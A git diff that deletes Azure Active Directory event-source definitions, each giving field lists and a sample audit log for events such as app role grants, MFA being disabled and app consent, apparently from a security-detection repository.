-- src_user_type
-- status
-- tag
-- tag::eventtype
-- tenantId
-- time
-- timeendpos
-- timestartpos
-- user_agent
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"time": "2024-02-08T21:49:53.7643129Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam", "operationName": "Add app role assignment to service principal", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "durationMs": 0, "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433", "identity": "LegacyTestOAuthApp", "Level": 4, "properties": {"id": "Directory_ed53faec-49b5-444f-b6af-b928558ca433_XH34Q_29215277", "category": "ApplicationManagement", "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433", "result": "success", "resultReason": "", "activityDisplayName": "Add app role assignment to service principal", "activityDateTime": "2024-02-08T21:49:53.7643129+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"app": {"appId": null, "displayName": "LegacyTestOAuthApp", "servicePrincipalId": "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "servicePrincipalName": null}}, "targetResources": [{"id": "8429eb5c-faeb-4ade-8eac-acc003790769", "displayName": "Office 365 Exchange Online", "type": "ServicePrincipal", "modifiedProperties": [{"displayName": "AppRole.Id", "oldValue": null, "newValue": "\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\""}, {"displayName": "AppRole.Value", "oldValue": null, "newValue": "\"full_access_as_app\""}, {"displayName": "AppRole.DisplayName", "oldValue": null, "newValue": "\"Use Exchange Web Services with full access to all mailboxes\""}, {"displayName": "AppRoleAssignment.CreatedDateTime", "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""}, {"displayName": "AppRoleAssignment.LastModifiedDateTime", "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""}, {"displayName": "ServicePrincipal.ObjectID", "oldValue": null, "newValue": "\"2e5c2fd0-cca4-452c-9891-a07c0dafd964\""}, {"displayName": "ServicePrincipal.DisplayName", "oldValue": null, "newValue": "\"STRT_Oauth\""}, {"displayName": "ServicePrincipal.AppId", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""}, {"displayName": "ServicePrincipal.Name", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""}, {"displayName": "TargetId.ServicePrincipalNames", "oldValue": null, "newValue": "\"https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com\""}], "administrativeUnits": []}, {"id": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "displayName": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "type": "ServicePrincipal", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:28:58 PST 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4"}, {"key": "AppId", "value": "00000002-0000-0ff1-ce00-000000000000"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml
deleted file mode 100644
index 2e08550066..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Add member to role
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-04-28T16:39:51.9312625Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Add member to role", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "52.177.250.168", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b", "Level": 4, "properties": {"id": "Directory_b425f2d7-2245-4952-b599-61dff8054f2b_FLAW0_72812697", "category": "RoleManagement", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b", "result": "success", "resultReason": "", "activityDisplayName": "Add member to role", "activityDateTime": "2023-04-28T16:39:51.9312625+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user": {"id": "3bd47e42-37c9-442f-a2b4-f04de61ef0ce", "displayName": null, "userPrincipalName": "strt_admin@splunkresearch.com", "ipAddress": "52.177.250.168", "roles": []}}, "targetResources": [{"id": "0d664d57-a3ee-4049-8642-280a5c7243ef", "displayName": null, "type": "User", "userPrincipalName": "User1@splunkresearch.com", "modifiedProperties": [{"displayName": "Role.ObjectID", "oldValue": null, "newValue": "\"38bf5baf-7ec7-4bc2-8920-6d4044da12c2\""}, {"displayName": "Role.DisplayName", "oldValue": null, "newValue": "\"Privileged Role Administrator\""}, {"displayName": "Role.TemplateId", "oldValue": null, "newValue": "\"9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3\""}, {"displayName": "Role.WellKnownObjectName", "oldValue": null, "newValue": "\"ApplicationAdministrators\""}], "administrativeUnits": []}, {"id": "38bf5baf-7ec7-4bc2-8920-6d4044da12c2", "displayName": null, "type": "Role", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml
deleted file mode 100644
index cadf2aeba0..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-event_name: Azure Active Directory Add owner to application
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- eventtype
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-06-20T15:54:13.2420879Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Add owner to application", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "20.190.135.43", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040", "Level": 4, "properties": {"id": "Directory_231de5d4-2156-433a-8163-48956bdaa040_C21RW_365283677", "category": "ApplicationManagement", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040", "result": "success", "resultReason": "", "activityDisplayName": "Add owner to application", "activityDateTime": "2023-06-20T15:54:13.2420879+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user": {"id": "4d3f1865-b395-4430-91dc-1b9dd337712e", "displayName": null, "userPrincipalName": "globaladmin@splunkresearch.com", "ipAddress": "20.190.135.43", "roles": []}}, "targetResources": [{"id": "dd92f1af-43d7-47d9-b93c-a78c6b635180", "displayName": null, "type": "User", "userPrincipalName": "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName": "Application.ObjectID", "oldValue": null, "newValue": "\"bb2479d8-5e89-4480-bb7e-3178d5a5d469\""}, {"displayName": "Application.DisplayName", "oldValue": null, "newValue": "\"CloudForge\""}, {"displayName": "Application.AppId", "oldValue": null, "newValue": "\"f0748f3d-45f2-4e2e-a4e1-f2e2b5271bdf\""}], "administrativeUnits": []}, {"id": "bb2479d8-5e89-4480-bb7e-3178d5a5d469", "displayName": null, "type": "Application", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Darwin 22.4.0 Darwin Kernel Version 22.4.0: Mon Mar  6 21:00:17 PST 2023; root:xnu-8796.101.5~3/RELEASE_X86_64; en-US) PowerShell/7.3.4"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml
deleted file mode 100644
index 0dfa31a2a0..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Add service principal
-fields:
-- _time
-- Level
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2024-02-07T22:31:14.4970418Z", "resourceId": "/tenants/a417c578-c7ee-480d-a225-d48057e74df5/providers/Microsoft.aadiam", "operationName": "Add service principal", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "a417c578-c7ee-480d-a225-d48057e74df5", "resultSignature": "None", "durationMs": 0, "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2", "Level": 4, "properties": {"id": "Directory_ea473f15-64b3-435a-a885-6ee3908919e2_GSOLK_21152854", "category": "ApplicationManagement", "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2", "result": "success", "resultReason": "", "activityDisplayName": "Add service principal", "activityDateTime": "2024-02-07T22:31:14.4970418+00:00", "loggedByService": "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName": "Herman@phantomengineering.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id": "2dedf863-ac93-4f45-87b3-e32f48145380", "displayName": "Malicious11", "type": "ServicePrincipal", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[]", "newValue": "[true]"}, {"displayName": "AppPrincipalId", "oldValue": "[]", "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName": "DisplayName", "oldValue": "[]", "newValue": "[\"Malicious11\"]"}, {"displayName": "ServicePrincipalName", "oldValue": "[]", "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName": "Credential", "oldValue": "[]", "newValue": "[{\"CredentialType\":2,\"KeyStoreId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\"KeyGroupId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"}]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\""}, {"displayName": "TargetId.ServicePrincipalNames", "oldValue": null, "newValue": "\"e06366ca-8489-4748-b6a2-d7e4332f45c1\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "e06366ca-8489-4748-b6a2-d7e4332f45c1"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml
deleted file mode 100644
index 96b1e771de..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Add unverified domain
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-26T13:45:54.1582053Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Add unverified domain", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b", "Level": 4, "properties": {"id": "Directory_bdab88f3-69a4-4e66-883d-5b1e1558e61b_311NT_82497138", "category": "DirectoryManagement", "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b", "result": "success", "resultReason": "", "activityDisplayName": "Add unverified domain", "activityDateTime": "2023-07-26T13:45:54.1582053+00:00", "loggedByService": "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com", "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue": "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue": "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml
deleted file mode 100644
index bf673225e6..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-event_name: Azure Active Directory Consent to application
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- eventtype
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-10-27T16:14:14.9747033Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam", "operationName": "Consent to application", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "resultDescription": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException", "durationMs": 0, "callerIpAddress": "13.85.188.242", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5", "Level": 4, "properties": {"id": "Directory_864210f1-2950-47cb-9e12-1a71dcbdb1d5_DO21D_338329364", "category": "ApplicationManagement", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5", "result": "failure", "resultReason": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException", "activityDisplayName": "Consent to application", "activityDateTime": "2023-10-27T16:14:14.9747033+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user": {"id": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "displayName": null, "userPrincipalName": "user15@splunkresearch.onmicrosoft.com", "ipAddress": "13.85.188.242", "roles": []}}, "targetResources": [{"id": "6228c72e-8895-4681-bbda-238132dc4f3c", "displayName": "Bad App 1", "type": "Application", "modifiedProperties": [{"displayName": "ConsentContext.IsAdminConsent", "oldValue": null, "newValue": "\"False\""}, {"displayName": "ConsentContext.IsAppOnly", "oldValue": null, "newValue": "\"False\""}, {"displayName": "ConsentContext.OnBehalfOfAll", "oldValue": null, "newValue": "\"False\""}, {"displayName": "ConsentContext.Tags", "oldValue": null, "newValue": "\"WindowsAzureActiveDirectoryIntegratedApp\""}, {"displayName": "ConsentAction.Permissions", "oldValue": null, "newValue": "\"[] => [[Id: AAAAAAAAAAAAAAAAAAAAALSZcc5Sj_NGtUtP2B3pYeI2veRXIpdKSpcpcgPY4Aty, ClientId: 00000000-0000-0000-0000-000000000000, PrincipalId: 57e4bd36-9722-4a4a-9729-7203d8e00b72, ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: Principal, Scope: Mail.Read Mail.Read.Shared Mail.ReadBasic Mail.ReadBasic.Shared Mail.ReadWrite Mail.ReadWrite.Shared Mail.Send Mail.Send.Shared User.Read, CreatedDateTime: , LastModifiedDateTime ]]; \""}, {"displayName": "ConsentAction.Reason", "oldValue": null, "newValue": "\"Risky application detected\""}, {"displayName": "MethodExecutionResult.", "oldValue": null, "newValue": "\"Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "EvoSTS"}, {"key": "AppId", "value": "96f6a3d6-d5aa-4af5-a77a-9319b5283712"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml
deleted file mode 100644
index 1d6e5c1343..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml
+++ /dev/null
@@ -1,52 +0,0 @@
-event_name: Azure Active Directory Disable Strong Authentication
-fields:
-- _time
-- Level
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-11T00:01:35.0251899Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Disable Strong Authentication", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e", "Level": 4, "properties": {"id": "Directory_7e3ee05c-ce4f-4ff1-8230-55555c25c97e_DADCR_14299826", "category": "UserManagement", "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e", "result": "success", "resultReason": "", "activityDisplayName": "Disable Strong Authentication", "activityDateTime": "2023-07-11T00:01:35.0251899+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "oops@splunkresearch.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id": "94b969a3-11cb-4075-a1fd-9fee3daf692e", "displayName": null, "type": "User", "userPrincipalName": "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName": "StrongAuthenticationRequirement", "oldValue": "[{\"RelyingParty\":\"*\",\"State\":1,\"RememberDevicesNotIssuedBefore\":\"2023-07-11T00:01:26+00:00\"}]", "newValue": "[]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"StrongAuthenticationRequirement\""}], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml
deleted file mode 100644
index 840e226dde..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Enable account
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-24T14:28:15.2223487Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Enable account", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413188", "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "result": "success", "resultReason": "", "activityDisplayName": "Enable account", "activityDateTime": "2023-07-24T14:28:15.2223487+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": null, "type": "User", "userPrincipalName": "testuser@splunkresearch.com", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled\""}], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml
deleted file mode 100644
index 05aa34c116..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml
+++ /dev/null
@@ -1,52 +0,0 @@
-event_name: Azure Active Directory Invite external user
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-13T00:29:59.5100003Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Invite external user", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "40.126.4.40", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99", "Level": 4, "properties": {"id": "Invited Users_e7d580a6-eaac-4f82-843c-40b0b5f3cf99_YNUMP_7291793", "category": "UserManagement", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99", "result": "success", "resultReason": null, "activityDisplayName": "Invite external user", "activityDateTime": "2023-07-13T00:29:59.5100003+00:00", "loggedByService": "Invited Users", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "oopsr@splunkresearch.com", "ipAddress": "40.126.4.40", "roles": []}}, "targetResources": [{"id": "f416526a-17ee-4129-8ca9-f5ee55f69f34", "displayName": "oops", "type": "User", "userPrincipalName": 